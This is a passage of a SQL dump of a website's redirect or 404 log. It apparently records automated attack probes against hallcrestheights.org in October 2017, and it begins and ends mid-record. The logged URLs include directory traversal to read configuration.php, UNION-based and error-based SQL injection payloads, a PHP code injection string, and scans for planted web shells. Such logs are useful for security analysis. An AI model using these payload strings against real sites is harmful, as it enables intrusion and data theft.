00:00:00'),(12132,'http://hallcrestheights.org/components/com_contushdvideoshare/hdflvplayer/download.php?f=../../../configuration.php',NULL,'','',5,0,'2017-10-05 14:31:58','0000-00-00 00:00:00'),(12133,'http://hallcrestheights.org/index.php?option=com_spidercontacts&contact_id=1 UNION SELECT 1,concat(0x776F6F79756E),3,4,5,6,7,8,9,10,11,12--&view=showcontact&lang=ca',NULL,'','',3,0,'2017-10-05 14:31:58','0000-00-00 00:00:00'),(12134,'http://hallcrestheights.org/index.php?option=com_osproperty&lang=en&no_html=1&tmpl=component&task=ajax_loadStateInListPage&country_id=0\' and(select 1 from(select count(*),concat((select (select (select concat(0x7e,0x776F6F79756E,0x7e))) from information_s',NULL,'','',1,0,'2017-10-05 14:31:58','0000-00-00 00:00:00'),(12135,'http://hallcrestheights.org/index.php?option=com_simplephotogallery&view=images&photoid=&Itemid=&albumid=-0 UNION ALL SELECT NULL,NULL,CONCAT(0x776F6F79756E),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--',NULL,'','',3,0,'2017-10-05 14:32:06','0000-00-00 00:00:00'),(12136,'http://hallcrestheights.org/index.php?option=com_hdflvplayer&id=-0 UNION ALL SELECT CONCAT(0x776F6F79756E),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--',NULL,'','',3,0,'2017-10-05 14:32:06','0000-00-00 00:00:00'),(12137,'http://hallcrestheights.org/sqlibak.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:05:01','0000-00-00 00:00:00'),(12138,'http://hallcrestheights.org/Iontrol.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:05:26','0000-00-00 00:00:00'),(12139,'http://hallcrestheights.org/wp-content/plugins/SocketIontrol.php',NULL,'hallcrestheights.org','',31,0,'2017-10-06 14:06:58','0000-00-00 00:00:00'),(12140,'http://hallcrestheights.org/wp-includes/theme-compat/files.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:07:44','0000-00-00 00:00:00'),(12141,'http://hallcrestheights.org/wp-check.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:08:15','0000-00-00 00:00:00'),(12142,'http://hallcrestheights.org/maps.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:06:54','0000-00-00 00:00:00'),(12143,'http://hallcrestheights.org/configbak.php',NULL,'hallcrestheights.org','',35,0,'2017-10-06 14:09:29','0000-00-00 00:00:00'),(12144,'http://hallcrestheights.org/wp-admin/network/update.php?login=x2a5xB',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:08:29','0000-00-00 00:00:00'),(12145,'http://hallcrestheights.org/Keith.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:08:54','0000-00-00 00:00:00'),(12146,'http://hallcrestheights.org/reade.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:09:00','0000-00-00 00:00:00'),(12147,'http://hallcrestheights.org/wp-content/plugins/BirdsRios.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:10:30','0000-00-00 00:00:00'),(12148,'http://hallcrestheights.org/functions.php',NULL,'hallcrestheights.org','',6,0,'2017-10-06 14:10:30','0000-00-00 00:00:00'),(12149,'http://hallcrestheights.org/wp_honor.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:10:30','0000-00-00 00:00:00'),(12150,'http://hallcrestheights.org/wp-content/plugins/Wp-LayerSlider/layerslider.php?login=qlaoxk',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:10:50','0000-00-00 00:00:00'),(12151,'http://hallcrestheights.org/wp-includes/class-comments.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:11:05','0000-00-00 00:00:00'),(12152,'http://hallcrestheights.org/wp-content/plugins/SocketIasrgasfontrol.php',NULL,'hallcrestheights.org','',29,0,'2017-10-06 14:13:58','0000-00-00 00:00:00'),(12153,'http://hallcrestheights.org/Tobey.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:14:00','0000-00-00 00:00:00'),(12154,'http://hallcrestheights.org/wp-tmp.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:14:01','0000-00-00 00:00:00'),(12155,'http://hallcrestheights.org/wp-content/plugins/all-in-one-seo/aioseop_class.php?login=fg5mb',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:13:07','0000-00-00 00:00:00'),(12156,'http://hallcrestheights.org/news.php',NULL,'hallcrestheights.org','',10,0,'2017-10-06 14:14:30','0000-00-00 00:00:00'),(12157,'http://hallcrestheights.org/upgrade.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:13:59','0000-00-00 00:00:00'),(12158,'http://hallcrestheights.org/wp-content/plugins/BirdsRio.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:16:33','0000-00-00 00:00:00'),(12159,'http://hallcrestheights.org/wp-content/plugins/thumbnail.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:18:48','0000-00-00 00:00:00'),(12160,'http://hallcrestheights.org/images/READMES.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:17:56','0000-00-00 00:00:00'),(12161,'http://hallcrestheights.org/wp-cokd.php',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:19:53','0000-00-00 00:00:00'),(12162,'http://hallcrestheights.org/tong.php?login=kmufg',NULL,'hallcrestheights.org','',1,0,'2017-10-06 14:19:17','0000-00-00 00:00:00'),(12163,'http://hallcrestheights.org/indes.php',NULL,'hallcrestheights.org','',1,0,'2017-10-07 21:28:05','0000-00-00 00:00:00'),(12164,'http://hallcrestheights.org/wp-conde.php',NULL,'hallcrestheights.org','',1,0,'2017-10-07 21:30:20','0000-00-00 00:00:00'),(12165,'http://hallcrestheights.org/cod.php',NULL,'hallcrestheights.org','',2,0,'2017-10-07 21:30:56','0000-00-00 00:00:00'),(12166,'http://hallcrestheights.org/yt2.php',NULL,'hallcrestheights.org','',2,0,'2017-10-07 21:37:23','0000-00-00 00:00:00'),(12167,'http://hallcrestheights.org/ytt.php',NULL,'hallcrestheights.org','',2,0,'2017-10-07 21:38:42','0000-00-00 00:00:00'),(12168,'http://hallcrestheights.org/sandy/popup-pomo.php',NULL,'http://hallcrestheights.org/sandy/popup-pomo.php','',2,0,'2017-10-09 00:53:49','0000-00-00 00:00:00'),(12169,'http://www.hallcrestheights.org/Marvins.php',NULL,'','',1,0,'2017-10-09 11:14:45','0000-00-00 00:00:00'),(12170,'http://www.hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/Marvins.php',NULL,'','',1,0,'2017-10-09 11:16:08','0000-00-00 00:00:00'),(12171,'http://www.hallcrestheights.org/gtde.php',NULL,'http://www.hallcrestheights.org','',3,0,'2017-10-09 11:16:09','0000-00-00 00:00:00'),(12172,'http://www.hallcrestheights.org/styles.js.php',NULL,'http://www.hallcrestheights.org','',4,0,'2017-10-09 11:16:23','0000-00-00 00:00:00'),(12173,'http://www.hallcrestheights.org/11.php',NULL,'http://www.hallcrestheights.org','',4,0,'2017-10-09 11:16:48','0000-00-00 00:00:00'),(12174,'http://www.hallcrestheights.org/wp-content/plugins/easyrotator-for-wordpress/prv8.php',NULL,'','',1,0,'2017-10-09 11:17:12','0000-00-00 00:00:00'),(12175,'http://www.hallcrestheights.org/prv8.php',NULL,'','',1,0,'2017-10-09 11:15:53','0000-00-00 00:00:00'),(12176,'http://hallcrestheights.org/styles.js.php',NULL,'hallcrestheights.org','',1,0,'2017-10-09 11:59:55','0000-00-00 00:00:00'),(12177,'http://hallcrestheights.org/google.php',NULL,'hallcrestheights.org','',1,0,'2017-10-09 13:40:19','0000-00-00 00:00:00'),(12178,'http://hallcrestheights.org/paypalapi/popup-pomo.php',NULL,'http://hallcrestheights.org/paypalapi/popup-pomo.php','',4,0,'2017-10-10 08:57:48','0000-00-00 00:00:00'),(12179,'http://hallcrestheights.org/gtde.php',NULL,'hallcrestheights.org','',1,0,'2017-10-10 09:57:15','0000-00-00 00:00:00'),(12180,'http://hallcrestheights.org/phqmv.php',NULL,'hallcrestheights.org','',1,0,'2017-10-10 09:58:11','0000-00-00 00:00:00'),(12181,'http://hallcrestheights.org/components/com_banners/helpers/mdama.php',NULL,'http://hallcrestheights.org/components/com_banners/helpers/mdama.php','',1,0,'2017-10-10 15:00:32','0000-00-00 00:00:00'),(12182,'http://hallcrestheights.org/components/com_contact/helpers/sun.php',NULL,'http://hallcrestheights.org/components/com_contact/helpers/sun.php','',1,0,'2017-10-10 19:22:20','0000-00-00 00:00:00'),(12183,'https://hallcrestheights.org/templates/jtemplate/j1template.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 00:34:34','0000-00-00 00:00:00'),(12184,'https://hallcrestheights.org/templates/j2template/j2template.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 00:36:22','0000-00-00 00:00:00'),(12185,'https://hallcrestheights.org/images/jlogo.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 00:37:16','0000-00-00 00:00:00'),(12186,'https://hallcrestheights.org/joomla/media/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 00:37:18','0000-00-00 00:00:00'),(12187,'https://hallcrestheights.org/templates/ja_purity/index.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 00:37:35','0000-00-00 00:00:00'),(12188,'https://hallcrestheights.org/media/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',4,0,'2017-10-11 00:36:35','0000-00-00 00:00:00'),(12189,'https://hallcrestheights.org/templates/jtemplate/jtemplate.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 00:38:08','0000-00-00 00:00:00'),(12190,'https://hallcrestheights.org/language/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 00:40:19','0000-00-00 00:00:00'),(12191,'https://hallcrestheights.org/logs/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',4,0,'2017-10-11 00:42:35','0000-00-00 00:00:00'),(12192,'https://hallcrestheights.org/modules/mod_jmodule/mod_j1module.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 00:46:16','0000-00-00 00:00:00'),(12193,'https://hallcrestheights.org/tmp/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 00:49:54','0000-00-00 00:00:00'),(12194,'https://hallcrestheights.org/modules/mod_j2module/mod_j2module.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 00:50:35','0000-00-00 00:00:00'),(12195,'https://hallcrestheights.org/components/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 00:54:24','0000-00-00 00:00:00'),(12196,'https://hallcrestheights.org/modules/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 01:01:17','0000-00-00 00:00:00'),(12197,'https://hallcrestheights.org/templates/rhuk_milkyway/index.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 01:12:04','0000-00-00 00:00:00'),(12198,'https://hallcrestheights.org/templates/thumbsj3tmp/img.resize.php',NULL,'hallcrestheights.org','',2,0,'2017-10-11 01:27:31','0000-00-00 00:00:00'),(12199,'http://hallcrestheights.org/marvins.php',NULL,'http://hallcrestheights.org/marvins.php','',4,0,'2017-10-11 02:05:03','0000-00-00 00:00:00'),(12200,'http://hallcrestheights.org/logs/sun.php',NULL,'http://hallcrestheights.org/logs/sun.php','',4,0,'2017-10-11 03:44:37','0000-00-00 00:00:00'),(12201,'http://hallcrestheights.org/mrswenvsr.php',NULL,'http://hallcrestheights.org/mrswenvsr.php','',5,0,'2017-10-11 06:32:53','0000-00-00 00:00:00'),(12202,'http://hallcrestheights.org/modules/mod_articles_category/tmpl/sun.php',NULL,'http://hallcrestheights.org/modules/mod_articles_category/tmpl/sun.php','',5,0,'2017-10-11 06:52:16','0000-00-00 00:00:00'),(12203,'http://hallcrestheights.org/rjsbgd.php',NULL,'http://hallcrestheights.org/rjsbgd.php','',1,0,'2017-10-11 11:14:43','0000-00-00 00:00:00'),(12204,'http://www.hallcrestheights.org/k61440-edzvdlqc-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-kcmumb-i20162637-hmgz-nkoheyru-pxpudzik.htm',NULL,'','',1,0,'2017-10-11 13:13:29','0000-00-00 00:00:00'),(12205,'http://www.hallcrestheights.org/wbwpbon-k45873-kydhx-jjikvf-vtzpxb-xkcwj-ybty-i20162630-lwosdu-ieqgws/',NULL,'','',1,0,'2017-10-11 13:15:47','0000-00-00 00:00:00'),(12206,'http://hallcrestheights.org/lsn_an.php',NULL,'http://hallcrestheights.org/lsn_an.php','',3,0,'2017-10-11 16:10:03','0000-00-00 00:00:00'),(12207,'http://hallcrestheights.org/layouts/joomla/edit/info.php',NULL,'http://hallcrestheights.org/layouts/joomla/edit/info.php','',5,0,'2017-10-11 21:02:18','0000-00-00 00:00:00'),(12208,'http://hallcrestheights.org/libraries/joomla/client/sun.php',NULL,'http://hallcrestheights.org/libraries/joomla/client/sun.php','',4,0,'2017-10-12 05:42:36','0000-00-00 00:00:00'),(12209,'http://hallcrestheights.org/tplpage.php',NULL,'http://hallcrestheights.org/tplpage.php','',3,0,'2017-10-12 07:28:43','0000-00-00 00:00:00'),(12210,'http://hallcrestheights.org/wp-updats.php',NULL,'hallcrestheights.org','',1,0,'2017-10-12 09:32:06','0000-00-00 00:00:00'),(12211,'http://hallcrestheights.org/content-post.php',NULL,'http://hallcrestheights.org/content-post.php','',4,0,'2017-10-12 09:36:57','0000-00-00 00:00:00'),(12212,'http://hallcrestheights.org/libraries/phputf8/sun.php',NULL,'http://hallcrestheights.org/libraries/phputf8/sun.php','',1,0,'2017-10-12 18:15:19','0000-00-00 00:00:00'),(12213,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-japyvrl-flxh-qjkuh-i20162632-kcmumb-hmgz-nkoheyru-k15420-pxpudzik-musshe.htm',NULL,'','',1,0,'2017-10-12 19:15:19','0000-00-00 00:00:00'),(12214,'https://hallcrestheights.org/cod.php',NULL,'hallcrestheights.org','',2,0,'2017-10-13 02:22:57','0000-00-00 00:00:00'),(12215,'https://hallcrestheights.org/temp.php',NULL,'hallcrestheights.org','',2,0,'2017-10-13 02:24:44','0000-00-00 00:00:00'),(12216,'https://hallcrestheights.org/yt2.php',NULL,'hallcrestheights.org','',2,0,'2017-10-13 02:25:46','0000-00-00 00:00:00'),(12217,'https://hallcrestheights.org/ytt.php',NULL,'hallcrestheights.org','',2,0,'2017-10-13 02:32:20','0000-00-00 00:00:00'),(12218,'https://hallcrestheights.org/yt.php',NULL,'hallcrestheights.org','',1,0,'2017-10-13 02:33:23','0000-00-00 00:00:00'),(12219,'https://hallcrestheights.org/wp-conde.php',NULL,'hallcrestheights.org','',1,0,'2017-10-13 02:33:28','0000-00-00 00:00:00'),(12220,'https://hallcrestheights.org/rnnvhs.php',NULL,'hallcrestheights.org','',1,0,'2017-10-13 02:35:42','0000-00-00 00:00:00'),(12221,'https://hallcrestheights.org/indes.php',NULL,'hallcrestheights.org','',1,0,'2017-10-13 02:39:16','0000-00-00 00:00:00'),(12222,'https://hallcrestheights.org/sample.php',NULL,'hallcrestheights.org','',1,0,'2017-10-13 02:43:31','0000-00-00 00:00:00'),(12223,'https://hallcrestheights.org/sfn.php',NULL,'hallcrestheights.org','',1,0,'2017-10-13 02:46:08','0000-00-00 00:00:00'),(12224,'http://hallcrestheights.org/skin/Signedint.php',NULL,'','',1,0,'2017-10-13 03:20:34','0000-00-00 00:00:00'),(12225,'http://www.hallcrestheights.org/wp/wp-login.php',NULL,'','',1,0,'2017-10-16 04:59:05','0000-00-00 00:00:00'),(12226,'http://hallcrestheights.org/en/wp-login.php',NULL,'','',1,0,'2017-10-16 06:34:40','0000-00-00 00:00:00'),(12227,'http://hallcrestheights.org/test/logo_img.php',NULL,'http://hallcrestheights.org/test/logo_img.php','',3,0,'2017-10-16 08:44:36','0000-00-00 00:00:00'),(12228,'http://hallcrestheights.org/libraries/cms/captcha/logo_img.php',NULL,'http://hallcrestheights.org/libraries/cms/captcha/logo_img.php','',3,0,'2017-10-16 15:31:38','0000-00-00 00:00:00'),(12229,'http://hallcrestheights.org/phpmyadmin/logo_img.php',NULL,'http://hallcrestheights.org/phpmyadmin/logo_img.php','',1,0,'2017-10-17 04:57:27','0000-00-00 00:00:00'),(12230,'http://hallcrestheights.org/dumper.php',NULL,'','',1,0,'2017-10-17 05:16:30','0000-00-00 00:00:00'),(12231,'http://hallcrestheights.org/language/zh-cn/logo_img.php',NULL,'http://hallcrestheights.org/language/zh-cn/logo_img.php','',4,0,'2017-10-17 06:41:59','0000-00-00 00:00:00'),(12232,'http://hallcrestheights.org/mail/logo_img.php',NULL,'http://hallcrestheights.org/mail/logo_img.php','',3,0,'2017-10-17 12:02:45','0000-00-00 00:00:00'),(12233,'http://hallcrestheights.org/docs/map.php',NULL,'http://hallcrestheights.org/docs/map.php','',3,0,'2017-10-19 05:53:24','0000-00-00 00:00:00'),(12234,'http://hallcrestheights.org/cache/template/Misfpo.php',NULL,'http://hallcrestheights.org/cache/template/Misfpo.php','',3,0,'2017-10-19 06:24:47','0000-00-00 00:00:00'),(12235,'http://hallcrestheights.org/bin/map.php',NULL,'http://hallcrestheights.org/bin/map.php','',3,0,'2017-10-19 08:30:20','0000-00-00 00:00:00'),(12236,'http://www.hallcrestheights.org/tmp/xax.php',NULL,'','',2,0,'2017-10-19 10:33:14','0000-00-00 00:00:00'),(12237,'http://www.hallcrestheights.org/tmp/vip.php',NULL,'','',2,0,'2017-10-19 10:33:15','0000-00-00 00:00:00'),(12238,'http://hallcrestheights.org/index.php?option=com_k2&view=itemlist',NULL,'','',1,0,'2017-10-19 10:52:35','0000-00-00 00:00:00'),(12239,'http://hallcrestheights.org/libraries/joomla/filter/pqcsfx3h.php',NULL,'http://hallcrestheights.org/libraries/joomla/filter/pqcsfx3h.php','',2,0,'2017-10-19 21:57:10','0000-00-00 00:00:00'),(12240,'http://hallcrestheights.org/components/com_djimageslider/Marvins.php',NULL,'http://hallcrestheights.org/components/com_djimageslider/Marvins.php','',4,0,'2017-10-19 22:05:02','0000-00-00 00:00:00'),(12241,'http://hallcrestheights.org/f397b/hopeir/map.php',NULL,'http://hallcrestheights.org/f397b/hopeir/map.php','',2,0,'2017-10-20 03:20:58','0000-00-00 00:00:00'),(12242,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/js/map.php',NULL,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/js/map.php','',6,0,'2017-10-20 08:07:21','0000-00-00 00:00:00'),(12243,'http://www.hallcrestheights.org/zmkuedtz-jivyo-qxifgxuh-xptvuhm-i20162632-iwnz-korpv-ubfgnq-tpmh-k36020-prbikzon-mtlajhol-jrdklt-sqwxxu.htm',NULL,'','',1,0,'2017-10-20 09:19:34','0000-00-00 00:00:00'),(12244,'http://hallcrestheights.org/usi.php',NULL,'http://hallcrestheights.org/usi.php','',5,0,'2017-10-20 10:40:44','0000-00-00 00:00:00'),(12245,'http://hallcrestheights.org/images/pqcsfx3h.php',NULL,'http://hallcrestheights.org/images/pqcsfx3h.php','',4,0,'2017-10-20 13:54:06','0000-00-00 00:00:00'),(12246,'http://www.hallcrestheights.org/i20162628-tkuykf-k58049-jdnjjbuc-yupa-jaylr/',NULL,'','',1,0,'2017-10-20 14:16:57','0000-00-00 00:00:00'),(12247,'http://hallcrestheights.org/media/system/images/map.php',NULL,'http://hallcrestheights.org/media/system/images/map.php','',4,0,'2017-10-20 14:58:31','0000-00-00 00:00:00'),(12248,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advimage/images/map.php',NULL,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/advimage/images/map.php','',2,0,'2017-10-20 16:22:10','0000-00-00 00:00:00'),(12249,'http://hallcrestheights.org/templates/beez3/css/Marvins.php',NULL,'http://hallcrestheights.org/templates/beez3/css/Marvins.php','',8,0,'2017-10-20 16:27:02','0000-00-00 00:00:00'),(12250,'http://hallcrestheights.org/installa/popup-pomo.php',NULL,'http://hallcrestheights.org/installa/popup-pomo.php','',6,0,'2017-10-20 16:36:08','0000-00-00 00:00:00'),(12251,'http://hallcrestheights.org/widgetsa/popup-pomo.php',NULL,'http://hallcrestheights.org/widgetsa/popup-pomo.php','',4,0,'2017-10-20 17:31:45','0000-00-00 00:00:00'),(12252,'http://hallcrestheights.org/tools/popup-pomo.php',NULL,'http://hallcrestheights.org/tools/popup-pomo.php','',11,0,'2017-10-20 18:36:57','0000-00-00 00:00:00'),(12253,'http://hallcrestheights.org/media/akeeba_strapper/css/smoothness/content-post.php',NULL,'http://hallcrestheights.org/media/akeeba_strapper/css/smoothness/content-post.php','',1,0,'2017-10-20 19:38:36','0000-00-00 00:00:00'),(12254,'http://hallcrestheights.org/components/com_banners/bgeiis.php',NULL,'http://hallcrestheights.org/components/com_banners/bgeiis.php','',3,0,'2017-10-20 22:59:06','0000-00-00 00:00:00'),(12255,'http://hallcrestheights.org/modules/mod_custom/tmpl/map.php',NULL,'http://hallcrestheights.org/modules/mod_custom/tmpl/map.php','',3,0,'2017-10-20 23:31:52','0000-00-00 00:00:00'),(12256,'http://hallcrestheights.org/images/Xjske.php',NULL,'http://hallcrestheights.org/images/Xjske.php','',4,0,'2017-10-21 00:58:55','0000-00-00 00:00:00'),(12257,'http://hallcrestheights.org/libraries/joomla/base/content-ubh.php',NULL,'http://hallcrestheights.org/libraries/joomla/base/content-ubh.php','',9,0,'2017-10-21 01:32:10','0000-00-00 00:00:00'),(12258,'http://www.hallcrestheights.org/ajaximg.jsp/',NULL,'','',1,0,'2017-10-23 06:47:10','0000-00-00 00:00:00'),(12259,'http://www.hallcrestheights.org/i20162628-dvis-k38242-ciwbvwk-uxkrb-zomsmv/uclzuph-vqawuoxz-mnpzvsg-crlycmcz-oqqe.htm',NULL,'','',1,0,'2017-10-23 10:08:57','0000-00-00 00:00:00'),(12260,'http://www.hallcrestheights.org/i20162630-kzpffmsx-k58551-klrd-edhwgef-vbbgzagp/eciyyuwu-vfzt-jigj-inamz-bcng-tfmlyrg/',NULL,'','',1,0,'2017-10-23 10:27:13','0000-00-00 00:00:00'),(12261,'http://www.hallcrestheights.org/i20162628-pcsc-qrufunp/k58742-kwxpo-ideotw.htm',NULL,'','',1,0,'2017-10-23 10:28:35','0000-00-00 00:00:00'),(12262,'http://www.hallcrestheights.org/i20162632-cwhriwgp-ekzq-dwkvumz/bsaiimjz-fozgdvdd-qjvd-obkn-k59391-lykco/',NULL,'','',1,0,'2017-10-23 10:30:27','0000-00-00 00:00:00'),(12263,'http://www.hallcrestheights.org/i20162635-yembj-vhtqqd/k907-ckzfl-tzte-rqbwnsw/',NULL,'','',1,0,'2017-10-23 10:30:28','0000-00-00 00:00:00'),(12264,'http://www.hallcrestheights.org/i20162635-k4750-gnfznxvj-xpalt/itjshkyj-yldpija-amdu.htm',NULL,'','',1,0,'2017-10-23 10:30:30','0000-00-00 00:00:00'),(12265,'http://hallcrestheights.org/templates/index.php',NULL,'hallcrestheights.org','',4,0,'2017-10-23 11:01:54','0000-00-00 00:00:00'),(12266,'http://www.hallcrestheights.org/i20162636-k22004-pcscq-rufu-npkw-xpoideot.htm',NULL,'','',1,0,'2017-10-23 11:12:50','0000-00-00 00:00:00'),(12267,'http://www.hallcrestheights.org/i20162632-ryvhrhmq-tyysl-lgeajanp/dmefnxh-qfhj-dyhao-k25470-xrcjhw-uvds.htm',NULL,'','',1,0,'2017-10-23 11:19:19','0000-00-00 00:00:00'),(12268,'http://www.hallcrestheights.org/i20162632-k42128-pcscqru-funpkwxp-oideotwt-vsoarmo.htm',NULL,'','',1,0,'2017-10-23 11:19:20','0000-00-00 00:00:00'),(12269,'http://www.hallcrestheights.org/i20162637-k23826-zmkued-tzjivy-oqxifg-xuhx/ptvuhm-iwnzko-rpvub-fgnqtpm-hprbikz-onmtla-jholjrd.htm',NULL,'','',1,0,'2017-10-23 11:20:42','0000-00-00 00:00:00'),(12270,'http://www.hallcrestheights.org/i20162628-jgletkym-drqzn-k18290-rvmlkswa-zvkecqq/neei-aqjzl-nplqfc-nebx-ilnvoxbd-jveebikp-tjvlxf-ayeaya.htm',NULL,'','',1,0,'2017-10-23 11:23:19','0000-00-00 00:00:00'),(12271,'http://www.hallcrestheights.org/i20162632-k15020-gnfznxvj-xpalt-itjshkyj-yldpija.htm',NULL,'','',2,0,'2017-10-23 11:47:08','0000-00-00 00:00:00'),(12272,'http://www.hallcrestheights.org/i20162636-k36080-gnfznxvj-xpalt-itjshkyj-yldpija.htm',NULL,'','',2,0,'2017-10-23 11:47:09','0000-00-00 00:00:00'),(12273,'http://www.hallcrestheights.org/i20162635-wbwpbonk-k7081-ydhx-jjikvfv-tzpxbxkc-wjybtylw/',NULL,'','',1,0,'2017-10-23 11:55:53','0000-00-00 00:00:00'),(12274,'http://www.hallcrestheights.org/i20162628-gnfz-nxvjxpa/k57842-ltitj-shkyjy.htm',NULL,'','',1,0,'2017-10-23 12:23:18','0000-00-00 00:00:00'),(12275,'http://www.hallcrestheights.org/i20162637-dvisci-k44326-wbvwku-xkrbzo-msmv/uclzup-hvqawu-oxzmn-pzvsgcr-lycmczo.htm',NULL,'','',1,0,'2017-10-23 12:23:30','0000-00-00 00:00:00'),(12276,'http://www.hallcrestheights.org/i20162628-k19340-dvisciwb-vwkux-krbzomsm-vuclzup.htm',NULL,'','',1,0,'2017-10-23 12:23:45','0000-00-00 00:00:00'),(12277,'http://hallcrestheights.org/index.php?option=com_foxcontact',NULL,'','',5,0,'2017-10-23 15:07:05','0000-00-00 00:00:00'),(12278,'http://hallcrestheights.org/.index.php?xo=echo(base64_decode(\'dGVzdA==\'));',NULL,'','',2,0,'2017-10-25 16:45:51','0000-00-00 00:00:00'),(12279,'http://www.hallcrestheights.org/blog//wp-login.php',NULL,'http://www.google.com.hk','',1,0,'2017-10-26 03:47:19','0000-00-00 00:00:00'),(12280,'http://www.hallcrestheights.org/k17864-edzvd-i20162633-lqco-mnnm-mcawvbfu.htm',NULL,'','',1,0,'2017-10-26 11:49:26','0000-00-00 00:00:00'),(12281,'http://hallcrestheights.org/components/com_kunena/controller/application/misc/default/htaccess.php',NULL,'http://site.ru','',1,0,'2017-10-29 14:20:38','0000-00-00 00:00:00'),(12282,'http://hallcrestheights.org/cli/oirdpux.php',NULL,'http://site.ru','',1,0,'2017-10-29 15:12:06','0000-00-00 00:00:00'),(12283,'http://hallcrestheights.org/xmlrpc/header_img.php',NULL,'http://site.ru','',1,0,'2017-10-29 17:19:19','0000-00-00 00:00:00'),(12284,'http://hallcrestheights.org/images/sampledata/parks/smile.php',NULL,'http://site.ru','',2,0,'2017-10-29 19:55:57','0000-00-00 00:00:00'),(12285,'http://hallcrestheights.org/libraries/joomla/github/package/orgs/svpkmz.php',NULL,'http://site.ru','',1,0,'2017-10-29 20:21:40','0000-00-00 00:00:00'),(12286,'http://hallcrestheights.org/plugins/system/rsforms.php',NULL,'http://site.ru','',3,0,'2017-10-29 20:41:35','0000-00-00 00:00:00'),(12287,'http://hallcrestheights.org/libraries/gantry/admin/widgets/xtloosj.php',NULL,'http://site.ru','',1,0,'2017-10-29 21:31:48','0000-00-00 00:00:00'),(12288,'http://hallcrestheights.org/plugins/installer/webinstaller/css/1.php',NULL,'http://site.ru','',1,0,'2017-10-29 23:20:47','0000-00-00 00:00:00'),(12289,'http://hallcrestheights.org/vmfilesinvoices/orajy.php',NULL,'http://site.ru','',1,0,'2017-10-29 23:50:56','0000-00-00 00:00:00'),(12290,'http://hallcrestheights.org/components/lpxss.php',NULL,'http://site.ru','',2,0,'2017-10-30 00:13:35','0000-00-00 00:00:00'),(12291,'http://hallcrestheights.org/modules/mod_k2_content/media-views-rtl.php',NULL,'http://site.ru','',1,0,'2017-10-30 01:11:56','0000-00-00 00:00:00'),(12292,'http://hallcrestheights.org/components/com_newsfeeds/helpers/wp-class.php',NULL,'http://site.ru','',1,0,'2017-10-30 01:29:07','0000-00-00 00:00:00'),(12293,'http://hallcrestheights.org/templates/beez_20/javascript/wp-class.php',NULL,'http://site.ru','',3,0,'2017-10-30 01:50:26','0000-00-00 00:00:00'),(12294,'http://hallcrestheights.org/components/com_kunena/controller/application/misc/htaccess.php',NULL,'http://site.ru','',1,0,'2017-10-30 02:23:36','0000-00-00 00:00:00'),(12295,'http://hallcrestheights.org/fosmanual/cache/logo_img.php',NULL,'http://site.ru','',2,0,'2017-10-30 05:24:29','0000-00-00 00:00:00'),(12296,'http://hallcrestheights.org/libraries/legacy/log/js.php',NULL,'http://site.ru','',9,0,'2017-10-30 07:34:23','0000-00-00 00:00:00'),(12297,'http://hallcrestheights.org/components/com_search/j_ajax.php',NULL,'http://site.ru','',3,0,'2017-10-30 07:37:48','0000-00-00 00:00:00'),(12298,'http://hallcrestheights.org/includes/vyxsvwg.php',NULL,'http://site.ru','',1,0,'2017-10-30 07:56:53','0000-00-00 00:00:00'),(12299,'http://hallcrestheights.org/images/images/enisej-ob-enisej/Matusale/wghqffm.php',NULL,'http://site.ru','',4,0,'2017-10-30 08:06:23','0000-00-00 00:00:00'),(12300,'http://hallcrestheights.org/libraries/gbpyq.php',NULL,'http://site.ru','',2,0,'2017-10-30 08:08:09','0000-00-00 00:00:00'),(12301,'http://hallcrestheights.org/plugins/system/vblrxyk.php',NULL,'http://site.ru','',5,0,'2017-10-30 08:27:30','0000-00-00 